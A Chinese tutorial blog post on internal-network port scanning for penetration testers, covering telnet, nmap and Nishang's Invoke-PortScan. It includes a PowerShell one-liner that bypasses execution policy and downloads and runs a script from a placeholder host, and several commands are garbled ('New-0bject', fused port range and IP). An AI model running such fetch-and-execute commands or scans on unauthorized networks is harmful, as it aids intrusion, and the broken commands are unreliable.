内网安全-信息收集-内网资源探测-内网端口扫描

内网端口扫描

简介

端口是一切网络入侵的入口。通过对内网主机进行端口扫描,测试人员可以确定目标主机上开放的服务类型、服务版本,并查找相应的漏洞进行攻击。测试人员可以根据目标主机的情况,上传工具进行扫描,也可以借助内网代理或路由转发对目标主机发起扫描。

1利用Telnet 探测端口

   Telnet是进行远程登录的标准协议和主要方式,为用户提供了在本地计算机上完成远程主机工作的能力。telnet命令可以简单测试指定的端口号是正常打开还是关闭状态。
   telnet <IP> <Port>

2利用 Nmap进行端口扫描

Nmap是一个十分强大的端口扫描工具,在实际利用中可以借助内网代理对内网主机进行端口扫描。关于 Nmap的使用,更多使用方法请参考Nmap官方手册。下面仅给出几个常用的扫描命令。

执行以下命令,扫描目标主机的指定端口
nmap -p 80,88,135,139,443,8080,3306,3389 192.168.204.147

执行以下命令,扫描目标主机开放的全部端口
nmap -sS -p 1-6553510.10.10.11

执行以下命令,扫描并获取目标主机指定端口上开放的服务版本
nmap -sV -p 80,88,135,139,443,8080,3306,3389 10.10.10.11

3利用PowerShell进行端口扫描

NiShang是基于PowerShell 的渗透测试专用框架,集成了各种脚本和 Payload,广泛用于渗透测试的各阶段。

NiShang的 Scan模块中也有一个Invoke-PortsCan.ps1脚本,可以用来对主机进行端口扫描(具体见 Github 上的相关网页)。

执行以下命令,对内网的一个主机范围执行默认的端口扫描:
Invoke-PortScan -StartAddress 192.168.204.1 —EndAddress 192.168.204.254 -ResolveHost -ScanPort

执行以下命令,对内网中的一个主机范围扫描指定的端口
powershell.exe -exec bypass -Command “IEX(New-0bject Net.WebClient). DownloadString(‘http://your-ip:;port/Invoke-portscan.ps1’);Invoke-PortScan -StartAddress 192.168.204.1 EndAddress-192.168.204.254-ResolveHost -ScanPort -Port 80, 88, 135, 139,443,8080,3306,3389”

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟-宇的个人博客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值